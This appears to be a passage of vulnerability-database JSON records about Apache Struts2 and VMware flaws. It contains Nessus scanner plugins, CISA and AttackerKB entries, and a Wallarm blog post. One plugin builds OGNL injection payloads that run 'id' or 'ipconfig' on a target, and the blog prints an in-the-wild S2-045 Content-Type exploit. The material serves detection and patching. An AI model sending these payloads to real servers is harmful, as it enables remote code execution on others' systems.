(!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\nforeach url (urls)\n{\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n\n foreach cmd (cmds)\n {\n attack = \"\";\n exploit = \"'+(#_memberAccess[\" + '\"allowStaticMethodAccess\"]=true,' +\n \"@java.lang.Runtime@getRuntime().exec('\" + cmd + \"'))+'\";\n\n # Build a string with all CGI arguments set to the exploit string\n foreach arg (cgi_args)\n {\n attack += arg + \"=\" + exploit + \"&\";\n }\n attack = ereg_replace(string:attack, pattern:\"&$\", replace:\"\");\n attack_url = url + \"?\" + attack;\n\n # Try testing with GET first\n # attack_url should look like this example :\n # /dir/blah.action?param='+(#memberAccess[\"allowStaticMethodAccess\"]=true,\n # @java.lang.Runtime@getRuntime().exec('id'))+'\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (res[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n output = res[2];\n break;\n }\n\n # Else try testing with POST\n attack_post = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n );\n\n res2 = http_send_recv3(\n method : \"POST\",\n item : url,\n data : attack_post,\n port : port,\n add_headers : make_array(\"Content-Type\",\n \"application/x-www-form-urlencoded\"),\n exit_on_fail : TRUE\n );\n\n if (res2[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = http_last_sent_request();\n output = res2[2];\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : chomp(output)\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:52:35", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple security issues. Oracle has documented the CVE identifiers that are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4180, CVE-2010-4252, CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-2110 to this issue.\n\ne. Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-1833, CVE-2011-2484, CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363, CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324, CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583 to these issues.\n\nf. Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-2761, CVE-2010-4410, and CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libmxl2 RPMs are updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-5029, CVE-2009-5064, CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864 to these issue.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-4128, CVE-2012-1569, and CVE-2012-1573 to these issues.\n\nj. Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS are updated to the following versions to resolve multiple security issues :\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 to these issues.\n\nk. Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been updated to 2.3.4 which addresses an arbitrary file overwrite vulnerability. This vulnerability allows an attacker to create a denial of service by overwriting arbitrary files without authentication. The attacker would need to be on the same network as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache struts 2.3.4 addresses the following issues as well :\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2012-08-31T00:00:00", "type": "nessus", "title": "VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0"], "id": "VMWARE_VMSA-2012-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/61747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2012-0013. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61747);\n script_version(\"1.57\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2010-2761\", \"CVE-2010-4180\", \"CVE-2010-4252\", \"CVE-2010-4410\", \"CVE-2011-0014\", \"CVE-2011-1020\", \"CVE-2011-1089\", \"CVE-2011-1833\", \"CVE-2011-2484\", \"CVE-2011-2496\", \"CVE-2011-2699\", \"CVE-2011-3188\", \"CVE-2011-3209\", \"CVE-2011-3363\", \"CVE-2011-3597\", \"CVE-2011-4108\", \"CVE-2011-4109\", \"CVE-2011-4110\", \"CVE-2011-4128\", \"CVE-2011-4132\", \"CVE-2011-4324\", \"CVE-2011-4325\", \"CVE-2011-4576\", \"CVE-2011-4577\", \"CVE-2011-4609\", \"CVE-2011-4619\", \"CVE-2012-0050\", \"CVE-2012-0060\", \"CVE-2012-0061\", \"CVE-2012-0207\", \"CVE-2012-0393\", \"CVE-2012-0815\", \"CVE-2012-0841\", \"CVE-2012-0864\", \"CVE-2012-1569\", \"CVE-2012-1573\", \"CVE-2012-1583\", \"CVE-2012-2110\");\n script_bugtraq_id(40063, 44199, 45145, 45163, 45164, 46264, 46567, 46740, 47321, 48383, 48802, 49108, 49289, 49626, 49911, 50311, 50609, 50663, 50755, 50798, 50898, 51194, 51257, 51281, 51343, 51366, 51439, 51467, 51563, 52009, 52010, 52011, 52012, 52013, 52014, 52015, 52016, 52017, 52018, 52019, 52020, 52107, 52161, 52201, 52667, 52668, 52865, 53136, 53139, 53158, 53946, 53947, 53948, 53949, 53950, 53951, 53952, 53953, 53954, 53956, 53958, 53959, 53960);\n script_xref(name:\"VMSA\", value:\"2012-0013\");\n\n script_name(english:\"VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"a. vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which\n addresses multiple security issues. Oracle has documented the\n CVE identifiers that are addressed by this update in the Oracle\n Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple\n security issues. Oracle has documented the CVE identifiers that\n are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical\n Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version\n 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-4180, CVE-2010-4252,\n CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576,\n CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version\n 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-2110 to this issue.\n\ne. Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple\n security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-1833, CVE-2011-2484,\n CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363,\n CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324,\n CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583\n to these issues.\n\nf. Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to\n perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-2761, CVE-2010-4410, and\n CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libmxl2 RPMs are updated to\n libxml2-2.6.26-2.1.15.el5_8.2 and\n libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security\n issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version\n glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-5029, CVE-2009-5064,\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864\n to these issue.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version\n 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-4128, CVE-2012-1569, and\n CVE-2012-1573 to these issues.\n\nj. Update to ESX service console popt, rpm, rpm-libs,\n and rpm-python RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n are updated to the following versions to resolve multiple\n security issues :\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0060, CVE-2012-0061, and\n CVE-2012-0815 to these issues.\n\nk. Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been\n updated to 2.3.4 which addresses an arbitrary file overwrite\n vulnerability. This vulnerability allows an attacker to create\n a denial of service by overwriting arbitrary files without\n authentication. The attacker would need to be on the same network\n as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache struts 2.3.4 addresses the following issues as well :\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It\n was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for\n reporting this issue to us.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2012/000197.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Field Bytecode Verifier Cache Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2012-08-30\");\nflag = 0;\n\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209401-SG\",\n patch_updates : make_list(\"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209402-SG\",\n patch_updates : make_list(\"ESX400-201305404-SG\", \"ESX400-201310402-SG\")\n )\n) flag++;\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201209404-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208101-SG\",\n patch_updates : make_list(\"ESX410-201211401-SG\", \"ESX410-201301401-SG\", \"ESX410-201304401-SG\", \"ESX410-201307401-SG\", \"ESX410-201312401-SG\", \"ESX410-201404401-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208102-SG\",\n patch_updates : make_list(\"ESX410-201301405-SG\", \"ESX410-201304402-SG\", \"ESX410-201307405-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208103-SG\",\n patch_updates : make_list(\"ESX410-201307403-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208104-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208105-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208106-SG\",\n patch_updates : make_list(\"ESX410-201307404-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208107-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.1\",\n patch : \"ESXi410-201208101-SG\",\n patch_updates : make_list(\"ESXi410-201211401-SG\", \"ESXi410-201301401-SG\", \"ESXi410-201304401-SG\", \"ESXi410-201307401-SG\", \"ESXi410-201312401-SG\", \"ESXi410-201404401-SG\", \"ESXi410-Update03\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 5.0\", vib:\"VMware:esx-base:5.0.0-1.25.912577\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-05-06T08:35:01", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "attackerkb", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-07-30T00:00:00", "id": "AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "href": "https://attackerkb.com/topics/xU2Ap2yNUC/cve-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:31:12", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2006-1547 | Apache Struts 1 ActionForm Denial of Service Vulnerability | 07/21/2022 \nCVE-2012-0391 | Apache Struts 2 Improper Input Validation Vulnerability | 07/21/2022 \nCVE-2018-8453 | Microsoft Windows Win32k Privilege Escalation Vulnerability | 07/21/2022 \nCVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability | 02/04/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1547", "CVE-2012-0391", "CVE-2018-8453", "CVE-2021-35247"], "modified": "2022-01-25T00:00:00", "id": "CISA:84B5063678E22C88DCF150A265C078F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "description": "Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology are broken altogether.\n\n\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "cvss3": {}, "published": "2017-03-09T00:15:54", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "modified": "2017-03-10T16:52:09", "href": 